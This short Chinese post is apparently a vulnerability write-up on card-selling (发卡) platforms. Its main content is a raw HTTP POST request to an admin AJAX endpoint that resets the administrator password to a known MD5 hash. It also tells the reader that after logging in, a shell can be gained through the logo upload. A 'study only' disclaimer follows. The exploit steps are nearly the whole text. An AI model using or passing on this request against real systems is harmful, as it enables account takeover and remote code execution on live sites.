某些发卡平台任意密码重置

1
2
3
4
5
6
7
8
9
POST /admin/ajax.php?act=upAdmin HTTP/1.1

..省略字段

x-requested-with:XMLHttpRequest

...省略字段

user=admin&pass=e10adc3949ba59abbe56e057f20f883e

登陆后台后可以在上传logo处getshell

漏洞挖掘
发卡平台 任意密码重置

声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.